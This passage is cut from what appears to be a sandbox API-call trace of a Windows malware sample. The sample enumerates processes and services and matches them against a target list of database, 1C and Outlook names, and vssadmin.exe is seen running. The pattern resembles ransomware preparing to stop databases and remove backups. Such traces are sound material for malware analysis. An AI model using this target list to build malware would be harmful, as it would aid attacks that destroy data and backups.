lpString2="WdiSystemHost") returned -1 [0037.245] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0037.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0037.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0037.245] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0037.245] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0037.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0037.245] lstrlenW (lpString="Winmgmt") returned 7 [0037.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0037.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0037.245] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0037.245] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0037.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0037.245] lstrlenW (lpString="WPDBusEnum") returned 10 [0037.245] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0037.245] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0037.245] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0037.245] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0037.245] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0037.245] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3806fc0 | out: hHeap=0x5f0000) returned 1 [0037.245] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0037.247] Process32FirstW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0037.248] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0037.249] lstrlenW (lpString="System") returned 6 [0037.249] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0037.249] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0037.249] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0037.249] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0037.249] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0037.249] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0037.249] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0037.249] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0037.250] lstrlenW (lpString="smss.exe") returned 8 [0037.250] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0037.250] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0037.250] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0037.250] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0037.250] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0037.250] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0037.250] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0037.250] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0037.250] lstrlenW (lpString="csrss.exe") returned 9 [0037.250] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0037.251] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0037.251] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0037.251] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0037.251] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0037.251] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0037.251] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0037.251] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0037.252] lstrlenW (lpString="wininit.exe") returned 11 [0037.252] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0037.252] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0037.252] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0037.252] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0037.252] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0037.252] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0037.252] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0037.252] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0037.252] lstrlenW (lpString="csrss.exe") returned 9 [0037.252] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0037.253] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0037.253] lstrlenW (lpString="winlogon.exe") returned 12 [0037.253] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0037.254] lstrlenW (lpString="services.exe") returned 12 [0037.254] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0037.255] lstrlenW (lpString="lsass.exe") returned 9 [0037.255] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0037.255] lstrlenW (lpString="lsm.exe") returned 7 [0037.255] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.256] lstrlenW (lpString="svchost.exe") returned 11 [0037.256] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.257] lstrlenW (lpString="svchost.exe") returned 11 [0037.257] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.257] lstrlenW (lpString="svchost.exe") returned 11 [0037.257] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.258] lstrlenW (lpString="svchost.exe") returned 11 [0037.258] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.259] lstrlenW (lpString="svchost.exe") returned 11 [0037.259] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0037.259] lstrlenW (lpString="audiodg.exe") returned 11 [0037.259] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.260] lstrlenW (lpString="svchost.exe") returned 11 [0037.260] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.261] lstrlenW (lpString="svchost.exe") returned 11 [0037.261] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0037.261] lstrlenW (lpString="dwm.exe") returned 7 [0037.261] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0037.262] lstrlenW (lpString="explorer.exe") returned 12 [0037.262] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0037.263] lstrlenW (lpString="spoolsv.exe") returned 11 [0037.263] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0037.263] lstrlenW (lpString="taskhost.exe") returned 12 [0037.263] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.264] lstrlenW (lpString="svchost.exe") returned 11 [0037.264] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0037.265] lstrlenW (lpString="taskeng.exe") returned 11 [0037.265] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0037.265] lstrlenW (lpString="taskhost.exe") returned 12 [0037.265] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0037.266] lstrlenW (lpString="entrepreneur.exe") returned 16 [0037.266] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0037.267] lstrlenW (lpString="andrew kinds.exe") returned 16 [0037.267] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0037.267] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0037.267] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0037.268] lstrlenW (lpString="educated.exe") returned 12 [0037.268] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0037.269] lstrlenW (lpString="servers.exe") returned 11 [0037.269] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0037.269] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0037.269] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0037.270] lstrlenW (lpString="gbp_chair.exe") returned 13 [0037.270] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0037.271] lstrlenW (lpString="attention infected.exe") returned 22 [0037.271] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0037.271] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0037.271] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0037.272] lstrlenW (lpString="pattern amateur.exe") returned 19 [0037.272] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0037.273] lstrlenW (lpString="referral.exe") returned 12 [0037.273] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0037.273] lstrlenW (lpString="copyingseems.exe") returned 16 [0037.273] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0037.274] lstrlenW (lpString="spin generally.exe") returned 18 [0037.274] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0037.275] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0037.275] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0037.275] lstrlenW (lpString="transmit.exe") returned 12 [0037.275] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0037.276] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0037.276] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0037.277] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0037.277] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0037.277] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0037.277] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0037.278] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0037.278] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0037.279] lstrlenW (lpString="delight.exe") returned 11 [0037.279] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0037.279] lstrlenW (lpString="within enquiry.exe") returned 18 [0037.279] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0037.280] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0037.280] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0037.281] lstrlenW (lpString="dllhost.exe") returned 11 [0037.281] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0037.281] lstrlenW (lpString="dllhost.exe") returned 11 [0037.281] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0037.282] lstrlenW (lpString="agent1c.exe") returned 11 [0037.282] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0037.702] lstrlenW (lpString="cmd.exe") returned 7 [0037.705] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0037.706] lstrlenW (lpString="conhost.exe") returned 11 [0037.706] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0037.707] lstrlenW (lpString="vssadmin.exe") returned 12 [0037.707] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0037.707] lstrlenW (lpString="VSSVC.exe") returned 9 [0037.708] Process32NextW (in: hSnapshot=0x17c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0037.708] CloseHandle (hObject=0x17c) returned 1 [0037.708] Sleep (dwMilliseconds=0x1f4) [0038.609] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3720948 [0038.704] EnumServicesStatusExW (in: hSCManager=0x3720948, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0038.704] GetLastError () returned 0xea [0038.704] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x123e) returned 0x3808fc0 [0038.705] EnumServicesStatusExW (in: hSCManager=0x3720948, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3808fc0, cbBufSize=0x123e, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3808fc0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0038.706] CloseServiceHandle (hSCObject=0x3720948) returned 1 [0038.706] lstrlenW (lpString="Appinfo") returned 7 [0038.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0038.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0038.706] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0038.706] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0038.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0038.706] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0038.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0038.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0038.706] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0038.706] lstrcmpiW (lpString1="mssqlserver", 